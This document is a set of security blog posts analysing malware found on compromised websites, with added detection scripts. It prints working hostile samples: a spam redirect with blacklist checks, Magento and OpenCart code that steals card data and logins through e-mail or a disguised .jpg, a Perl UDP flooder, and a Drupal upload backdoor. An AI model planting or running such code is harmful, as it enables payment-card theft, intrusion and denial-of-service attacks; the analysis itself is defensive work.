MiniCMS as a Spam Site Generator

SEO spam is very common for a reason -- money. Spammers are paid to promote websites on Google. We deal with lots of SEO spam cases daily. The most common cases are database infections, theme file infections and random spammy HTML pages. However, a few days ago we found an interesting variation: a whole CMS specially configured and used to load spam on a website.


The client asked us to help resolve spam issues in Google search results for their website. It was pretty clear that the doorways were still online when we began the analysis, so we quickly pinpointed the source of the spam. The hackers had created a directory where they installed a version of the MiniCMS application and populated it with spammy content.

MiniCMS is a legitimate minimalist content management system that does not use a database. To store posts and settings, it uses ordinary files (.dat files for posts), which makes it very easy to install on virtually any server that supports PHP. In this case, there were lots of spam .dat files.

This case shows that some site owners don’t realize they are providing a domain and free hosting to spammers until they get blacklisted or penalized by Google. This is why it is important to monitor your website for all sorts of anomalies. So keep an eye on Google search results for your site and on Search Console reports that may mention suspicious URLs or keywords on your site. You might even want to set up Google Alerts for common spammy keywords on your site. Regular internal and external security scans (for example, provided by our Website Monitoring Service) can help detect the problem even faster.

Blacklist Monitoring for Hackers and Webmasters

An infected site is only useful to cyber-criminals as long as it is not blacklisted. Traffic drops significantly when a URL is on Google’s Safe Browsing list. And if the hacked site is used for sending out email spam, then the success of the spam campaign depends directly on the server’s absence from anti-spam blacklists. That’s why it is important for hackers to know whether the sites they compromised are blacklisted or not.

Here’s an example of malware that works with Google’s and Spamhaus’s blacklists.


if ($_GET['mod']){
  // mod=0XX or mod=00X: ask Google Safe Browsing about the current host
  if($_GET['mod']=='0XX' OR $_GET['mod']=='00X'){
    $g_sch=file_get_contents('http://www.google.com/safebrowsing/diagnostic?output=jsonp&site=http%3A%2F%2F'.$_SERVER['HTTP_HOST'].'%2F');
    // $g_out receives the replacement count, i.e. whether "listed" occurred in the response
    $g_sch = str_replace('"listed"', '', $g_sch, $g_out);
    if($g_out){
      header('HTTP/1.1 202');
      exit;
    }
  }

  // mod=X0X or mod=00X: look the host up in the Spamhaus Domain Block List (DBL)
  if($_GET['mod']=='X0X' OR $_GET['mod']=='00X'){
    $sh = gethostbyname($_SERVER['HTTP_HOST'].'.dbl.spamhaus.org');
    // any of these DBL return codes means the domain is listed
    if ($sh=='127.0.1.2' or $sh=='127.0.1.4' or $sh=='127.0.1.5' or 
        $sh=='127.0.1.6' or $sh=='127.0.1.102' or $sh=='127.0.1.103' or 
        $sh=='127.0.1.104' or $sh=='127.0.1.105' or $sh=='127.0.1.106'){
      header('HTTP/1.1 203');
      exit;
    }
  }

  // neither lookup flagged the host
  header('HTTP/1.1 201');
  exit;
}

// default behaviour without the mod parameter: redirect the visitor to the spam site
header('HTTP/1.1 302 Found');
header('Location: hxxp://rx-webmart[.]su');

As you can see, by default it is plain web spam malware that redirects visitors to a site selling counterfeit drugs. But if you pass certain parameters to this script, it will check whether the site is blacklisted by Google and/or by Spamhaus (which suggests that the same campaign also involves email spamming). The result is returned as an HTTP status code:

  • 201 - not blacklisted
  • 202 - blacklisted by Google
  • 203 - blacklisted by Spamhaus.org

The use of HTTP status codes instead of human-readable results suggests that this functionality is used by a C&C server that regularly polls the blacklist status of all compromised sites.
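Those polls leave a distinctive trace in the web server log: a GET with the mod parameter answered with a 201, 202 or 203, which no CMS produces on its own. As an added example (not code from the original post), the script below flags that pattern in an Apache/nginx combined log; the log lines are constructed and the PHP file path is hypothetical, while the mod values and status codes are those of the malware sample.

```python
# Added example (not from the original post): flag the blacklist-polling requests
# described above in an Apache/nginx combined access log. The log lines are
# constructed for the demo and the script path is hypothetical; the "mod" values
# and the 201/202/203 replies are those of the malware sample.
import re
from urllib.parse import parse_qs, urlparse

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) '
)
POLL_MODES = {"0XX", "X0X", "00X"}
POLL_REPLIES = {"201": "not blacklisted", "202": "blacklisted by Google",
                "203": "blacklisted by Spamhaus"}

def find_polls(log_lines):
    """Return (client_ip, request_path, meaning) for each request matching the poll pattern."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        mode = parse_qs(urlparse(m.group("path")).query).get("mod", [None])[0]
        status = m.group("status")
        # A 201/202/203 answer to a plain GET of a PHP file is not normal CMS behaviour;
        # together with the mode parameter it identifies the C&C poll and its result.
        if mode in POLL_MODES and status in POLL_REPLIES:
            hits.append((m.group("ip"), m.group("path"), POLL_REPLIES[status]))
    return hits

# Constructed sample log: two polls from one client, normal traffic, and the redirect.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2016:04:12:01 +0000] "GET /wp-content/uploads/cache.php?mod=00X HTTP/1.1" 203 0 "-" "curl/7.35.0"',
    '198.51.100.2 - - [10/Mar/2016:04:12:05 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Mar/2016:05:12:01 +0000] "GET /wp-content/uploads/cache.php?mod=0XX HTTP/1.1" 201 0 "-" "curl/7.35.0"',
    '192.0.2.9 - - [10/Mar/2016:05:13:44 +0000] "GET /wp-content/uploads/cache.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, meaning in find_polls(SAMPLE_LOG):
        print(f"{ip} polled {path}: {meaning}")
```

The client IP that repeats these polls is the C&C server, so it is worth blocking and worth searching the rest of the logs for.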

While this sort of monitoring may be useful to hackers, it’s even more useful to normal site owners, who risk their business and reputation if their sites get blacklisted. For them, it is important to be able to investigate and resolve such incidents as soon as possible. That’s why Sucuri Website Antivirus includes monitoring of 10 blacklists (Google Safe Browsing, SpamHaus DBL, Norton Safe Web, PhishTank, Opera, SiteAdvisor, Bitdefender, Yandex, ESET, plus our own Sucuri blacklist). If a website gets blacklisted for any reason, not only do we inform the site owner about it, but we also help clean the site and remove it from the blacklists.

Another sample of a Magento compromise for profit

We often see malicious code being used to steal credit card details and other sensitive information from compromised Magento sites, but this one caught our eye because it differed from the others in how the information was collected and stored.

Usually the attacker sends all the sensitive information via e-mail, but in this case a text file with a ".jpg" extension is created to store all the data:

// The base64 string decodes to "admin|payment|order|saveOrder|onepage|checkout", hiding the keywords from a casual grep
if(preg_match("/".base64_decode('YWRtaW58cGF5bWVudHxvcmRlcnxzYXZlT3JkZXJ8b25lcGFnZXxjaGVja291dA==')."/i", $_SERVER["REQUEST_URI"])){ 
    // Appends the base64-encoded, serialized POST body and cookies to a file disguised as an image (.../media/catalog/product/2/1/21_1.jpg)
    if(!empty($_POST))@file_put_contents(base64_decode('L2Nocm9vdC9ob21lL2RhaWx5Z3JhL2RhaWx5Z3JhYnMuY29tL2h0bWwvbWVkaWEvY2F0YWxvZy9wcm9kdWN0LzIvMS8yMV8xLmpwZw=='), base64_encode( @serialize($_POST)."--".@seralize($_COOKIE) )."\n", FILE_APPEND);
}

Basically, this code writes every request that contains one of the words "admin|payment|order|saveOrder|onepage|checkout" in the URL to a file located at "/media/catalog/product/2/1/21_1.jpg".

As you can imagine at this point, the customers' credit card details and the admin logins are now available for the attacker to download.

The data is base64-encoded and serialized inside the file "21_1.jpg", but after reversing these steps you'll see something like this:

[payment] => Array
    (
        [method] => vm
        [cc_type] => VI
        [cc_number] => XXXXX -> indistinct cc number
        [c_exp_month] => 9
        [cc_exp_year] => 2017
        [cc_cid] => 048
    )

Among other data, you'll see admin passwords, customer data and credit card details. It's quite scary to realize that all this information is being stolen and that attackers are continually changing their methods to stay undetected.
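A drop file like this is easy to find once you stop trusting file extensions: a real JPEG starts with the bytes FF D8 FF, a base64 dump does not. The scanner below is an added example (not code from the original post) that walks a media directory, reports image-named files whose content is not an image, and notes when such a file consists of base64 lines like the dump described above; the directory tree it scans is constructed for the demo.

```python
# Added example (not from the original post): walk a media directory and report files
# whose image extension does not match their content, which is how a drop file like
# "21_1.jpg" above shows up. The directory and its files are constructed for the demo;
# the signatures are the standard JPEG/PNG/GIF magic bytes.
import base64
import os
import tempfile

IMAGE_MAGIC = {".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",),
               ".png": (b"\x89PNG\r\n\x1a\n",), ".gif": (b"GIF87a", b"GIF89a")}

def is_fake_image(path):
    """True if the extension promises an image but the leading bytes are not one."""
    ext = os.path.splitext(path)[1].lower()
    if ext not in IMAGE_MAGIC:
        return False
    with open(path, "rb") as fh:
        head = fh.read(8)
    return not any(head.startswith(sig) for sig in IMAGE_MAGIC[ext])

def is_base64_log(path):
    """True if every non-empty line is valid base64, the dump format described above."""
    with open(path, "rb") as fh:
        lines = [ln.strip() for ln in fh if ln.strip()]
    try:
        return bool(lines) and all(base64.b64decode(ln, validate=True) for ln in lines)
    except ValueError:
        return False

def scan_media(root):
    """Return sorted (relative_path, kind) for every fake image under root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if is_fake_image(full):
                kind = "base64 log" if is_base64_log(full) else "non-image content"
                findings.append((os.path.relpath(full, root), kind))
    return sorted(findings)

def build_demo_tree():
    """Constructed sample: one genuine JPEG header next to a base64 dump named .jpg."""
    root = tempfile.mkdtemp()
    product = os.path.join(root, "catalog", "product", "2", "1")
    os.makedirs(product)
    with open(os.path.join(product, "21_2.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xe0" + b"\x00" * 16)
    with open(os.path.join(product, "21_1.jpg"), "wb") as fh:
        fh.write(base64.b64encode(b'a:1:{s:6:"method";s:2:"vm";}--a:0:{}') + b"\n")
    return root
```

Run scan_media against the real media/ directory of a Magento install; a finding there is also a file that should be removed and whose creation time narrows down when the injected PHP was added.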

This particular code is usually added inside the files "./app/code/core/Mage/Core/functions.php" or "./lib/Varien/Autoload.php", but other files may be affected. We recommend checking the core files constantly for any change and keeping all software updated. Also, for obvious reasons, it's incredibly important to change the passwords of all admin users to avoid re-infection.

Finally, if you need professional help, you can always count on us.

Infected websites being used to distributed denial of...

After a website is compromised, it can be misused in multiple ways. We often see it being used in SEO spam campaigns or to distribute drive-by downloads. However, last week we found an interesting DDoS (Distributed Denial of Service) tool on one of our clients' websites that I would like to share.

The code was added to /var/tmp and was being called by an external PHP script, allowing a remote attacker to start a DDoS attack against specific targets. This is a snippet of the malicious code:

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
    goto randpakets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
    system("(sleep $time;killall -9 udp) &");
    goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
    goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
    system("(sleep $time;killall -9 udp) &"); 
    goto randpackets;
}
packets:
for (;;) {
    $size=$rand x $rand x $rand;
    send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}
randpackets:
for (;;) {
    $size=$rand x $rand x $rand;
    $port=(rand 65000) +1;
    send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

The malware takes $ip, $port and $time as arguments to launch the attack:

$ARGC=@ARGV;
my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[0];
$time=$ARGV[0];
socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");

Once the information is supplied, the script sends as many UDP packets as possible, trying to flood the victim’s network. A side effect is that the compromised server itself can become overloaded (CPU and memory) and exceed its bandwidth limits.
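The pattern this tool produces is visible from the network side before the server's resource graphs catch up: one source sending UDP to one destination at a rate no real client reaches, and in the random-port mode across thousands of destination ports. The detector below is an added example (not code from the original post) that applies rate and port-spread thresholds to flow records; the records and thresholds are constructed for the demo.

```python
# Added example (not from the original post): spot the traffic pattern of the UDP
# flooder above in flow or packet-capture summaries: one internal source sending UDP
# to one destination at a rate no normal service produces, in the random-port mode
# across thousands of destination ports. Records and thresholds are constructed here.
from collections import defaultdict

def detect_udp_flood(flows, min_pps=500, min_ports=50):
    """flows: (epoch_second, proto, src_ip, dst_ip, dst_port) tuples.
    Returns [(src, dst, peak_pps, distinct_ports, mode)] for pairs over the thresholds."""
    per_sec = defaultdict(int)   # (src, dst, second) -> packets
    ports = defaultdict(set)     # (src, dst) -> destination ports seen
    for ts, proto, src, dst, dport in flows:
        if proto != "udp":
            continue
        per_sec[(src, dst, ts)] += 1
        ports[(src, dst)].add(dport)
    peak = defaultdict(int)
    for (src, dst, _), n in per_sec.items():
        peak[(src, dst)] = max(peak[(src, dst)], n)
    alerts = []
    for (src, dst), pps in peak.items():
        if pps < min_pps:
            continue
        # Fixed-port mode trips the rate threshold alone; random-port mode also
        # shows a spread of destination ports that real clients never produce.
        nports = len(ports[(src, dst)])
        mode = "random ports" if nports >= min_ports else "fixed port"
        alerts.append((src, dst, pps, nports, mode))
    return sorted(alerts)

def demo_flows():
    """Constructed sample: a DNS trickle plus a two-second random-port UDP burst."""
    base = 1457582400
    dns = [(base + i % 10, "udp", "10.0.0.5", "10.0.0.2", 53) for i in range(40)]
    burst = [(base + i // 1500, "udp", "10.0.0.5", "203.0.113.50", (i * 7919) % 65000 + 1)
             for i in range(3000)]
    return dns + burst

if __name__ == "__main__":
    for src, dst, pps, nports, mode in detect_udp_flood(demo_flows()):
        print(f"{src} -> {dst}: {pps} pkt/s peak, {nports} ports ({mode})")
```

An alert from the web server's own address is the cue to look for the process holding the UDP socket and for recently written files in /tmp and /var/tmp.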

If your site is currently experiencing high usage of server resources or unexpected behavior, it could be an indication of a compromise. It’s equally important to be on the lookout for such issues.

You can always count on CloudProxy, our website firewall, to help protect your site against this and many other attacks.

File Uploader in Drupal Database

It’s very common to see backdoors such as uploaders among a site’s files. However, we have increasingly seen cases where file uploaders, mainly on Drupal websites, are located in the database. Many anti-malware products won’t catch those, since they usually look only at the files and don’t check the database content. Below is an example of a file uploader found in an entry of a Drupal database:

<?php
echo '<title>Uploader</title>';
echo '<center><font color="#11f0f3"><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"></center>';
echo '<center><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form></font><center>';
if( $_POST['_upl'] == "Upload" ) {
    // copies the uploaded file, keeping its original name, into the script's working directory
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
        echo '<center><br><br><b><font color="#11f0f3">UPLOAD SUCCESS!</font></b></center><br><br>';
    } else {
        echo '<center><br><br><b><font color="#f31111">UPLOAD FAILED!</font></b></center><br><br>';
    }
}
?>

The code above was embedded in a malicious post created by the attacker, as you can see in the following screenshot:

The code itself is simple: it accepts any file upload and writes it to the root of the site. However, if the database of your Drupal website is not properly inspected, you can be reinfected even after a deep inspection of your files.
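Inspecting the database for this means searching the stored post bodies for things that never belong in article text, such as a PHP open tag or a call to copy() on $_FILES. The scanner below is an added example (not code from the original post): it runs against an in-memory SQLite table that mirrors the entity_id and body_value columns of Drupal 7's field_data_body table, so the same SELECT can be pointed at the live database; the rows are constructed.

```python
# Added example (not from the original post): look for PHP embedded in post bodies
# stored in the database, the way the uploader above was. The in-memory SQLite table
# mirrors the entity_id/body_value columns of Drupal 7's field_data_body table so the
# same SELECT can be run against the live database; the rows are constructed.
import re
import sqlite3

# Markers with no business in article text: PHP open tags and file-write primitives.
SUSPICIOUS = re.compile(
    r"<\?php|\$_FILES\b|move_uploaded_file\s*\(|\bcopy\s*\(|\beval\s*\(|base64_decode\s*\(", re.I)

def scan_bodies(conn):
    """Return [(entity_id, first_marker_found)] for body rows that contain suspicious code."""
    hits = []
    for entity_id, body in conn.execute("SELECT entity_id, body_value FROM field_data_body"):
        m = SUSPICIOUS.search(body or "")
        if m:
            hits.append((entity_id, m.group(0)))
    return hits

def demo_db():
    """Constructed sample: a clean node, the uploader payload, and a benign use of 'copy'."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE field_data_body (entity_id INTEGER, body_value TEXT)")
    conn.executemany("INSERT INTO field_data_body VALUES (?, ?)", [
        (1, "<p>Welcome to our site.</p>"),
        (2, "<?php if($_POST['_upl']==\"Upload\"){@copy($_FILES['file']['tmp_name'],"
            "$_FILES['file']['name']);} ?>"),
        (3, "<p>Copy and paste the link to share this article.</p>"),
    ])
    return conn

if __name__ == "__main__":
    for entity_id, marker in scan_bodies(demo_db()):
        print(f"node {entity_id}: contains {marker!r}")
```

A hit also tells you which text format allowed the PHP to execute; disabling the PHP filter module and restricting full-HTML formats to trusted roles removes the mechanism the uploader relies on.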

If your site is currently infected and you need help cleaning it up, let us know.

Magento CC stealer adding user’s credentials to the...

While analyzing a compromised Magento site, we found another credit card (CC) stealer variation. We have posted a few times about this type of malware, but this one is a bit different in that it also steals the login credentials of the website's users; none of the ones we analyzed before had such behaviour.

The malicious code was found inside the app/code/core/Mage/Admin/Model/Session.php file and emails every login and password to XXX@XXX.com:

class Mage_Admin_Model_Session extends Mage_Core_Model_Session_Abstract
{
    ...skipped code...
    protected function testReview($username, $password, $email)
    {
        $to = 'removed@removed.dom';
        $subject = 'Webserver';
        $message = $username.'|'.$pssword.'|'.$email.'|'.$_SERVER['REQUEST_URI'];
        $headers = 'From: removed@removed.dom' . "\r\n" .
            'Reply-To: removed@removed.dom' . "\r\n" .
            'X-Mailer: PHP/' . phpversion();

        mail($to, $subject, $message, $headers);
    }
    ...skipped code...
    public function login($username, $password, $request = null) {
    ...skipped code...
    if ($user->getId()) {
                $this->testReview($username, $password, $user->getEmail());
                $this->renewSession();
                ...skipped code...
...skipped code...

This is the first time we have seen malware on Magento that steals credentials alongside credit card numbers. If you're using Magento as your e-commerce solution, always check your core files for any modified content and do regular scans. As always, if you need a professional service for your website, you can count on Sucuri.
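"Check your core files for any modified content" is only practical against a known-good baseline. The script below is an added example (not code from the original post or from Magento) that builds a SHA-256 manifest of an install, skipping the writable data directories, and later diffs the live tree against it; it catches the modified Session.php and functions.php of the Magento cases above as well as dropped files like the OpenCart stealer or the MiniCMS spam install. The directory tree it hashes is constructed for the demo.

```python
# Added example (not from the original post): a minimal core-file integrity check, the
# "check your core files for any modified content" advice from the Magento and OpenCart
# cases above, and a way to catch dropped files like the MiniCMS install. Build a SHA-256
# manifest from a clean install, keep it off the server, and diff the live tree against
# it. The tree below is constructed for the demo.
import hashlib
import os
import tempfile

def build_manifest(root, skip_dirs=("media", "var")):
    """Map relative path -> sha256 for every file under root, skipping writable data dirs."""
    manifest = {}
    for dirpath, dirnames, files in os.walk(root):
        dirnames[:] = [d for d in dirnames
                       if os.path.relpath(os.path.join(dirpath, d), root) not in skip_dirs]
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                manifest[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return manifest

def compare(baseline, current):
    """Return sorted lists of modified, added and missing paths."""
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "added": sorted(set(current) - set(baseline)),
        "missing": sorted(set(baseline) - set(current)),
    }

def demo():
    """Constructed: snapshot a tiny tree, then tamper with Session.php and drop a rogue file."""
    root = tempfile.mkdtemp()
    model_dir = os.path.join(root, "app", "code", "core", "Mage", "Admin", "Model")
    os.makedirs(model_dir)
    os.makedirs(os.path.join(root, "media"))
    session = os.path.join(model_dir, "Session.php")
    with open(session, "w") as fh:
        fh.write("<?php class Mage_Admin_Model_Session {}\n")
    baseline = build_manifest(root)
    with open(session, "a") as fh:
        fh.write("// injected function that mails credentials\n")
    with open(os.path.join(root, "app", "sh.php"), "w") as fh:
        fh.write("<?php // rogue file\n")
    with open(os.path.join(root, "media", "pic.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff")  # lives in a data dir, so it is ignored
    return compare(baseline, build_manifest(root))
```

Store the baseline manifest somewhere the web server cannot write, and regenerate it only right after a verified upgrade, otherwise an attacker who modifies a core file can simply update the manifest too.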

Credit Card Stealer on OpenCart CMS

We have previously analyzed many credit card stealer samples, especially those targeting the Magento platform:

However, this type of malicious code is not only used against Magento; we see it often on other e-commerce platforms as well. To give an example, we were analyzing a compromised OpenCart site and found the following entry in the file:

$smail = $order_info['order_id']."|".$order_info['payment_firstname']."|".$order_info['payment_lastname']
    ."|".$order_info['payment_address_1']."|".$order_info['payment_city']."|".$order_info['payment_postcode']
    ."|".$order_info['payment_zone']."|".$order_info['payment_country']."|".$order_info['telephone']
    ."|".$this->request->post['cc_expire_date_month']."|".$this->request->post['cc_expire_date_year']
    ."|".$this->request->post['cc_cvv2']."|".$this->request->post['cc_number'];
mail("swordsofnorthshirei@yopmail.com", "infectedOpenCart", $smail, "From: infected@anotheropencartsite.dom\r\nReply-to: bademail@yopmail.com");

If you are not familiar with PHP, this code collects all the credit card transaction data (including name, address, CVV, etc.) and emails it to swordsofnorthshirei@yopmail.com. Yopmail(.)com is a domain that provides disposable e-mail inboxes.

As you can see, e-commerce sites (and their customers) have a lot more to lose when they get compromised, as they process critical information from their users. Whenever possible, we recommend using third-party payment providers such as Stripe or PayPal to reduce your PCI scope and to keep credit card data from passing through your site at all.

If you run OpenCart or any other ecommerce platform, check out our Sucuri Firewall to protect your site from attacks and compromises.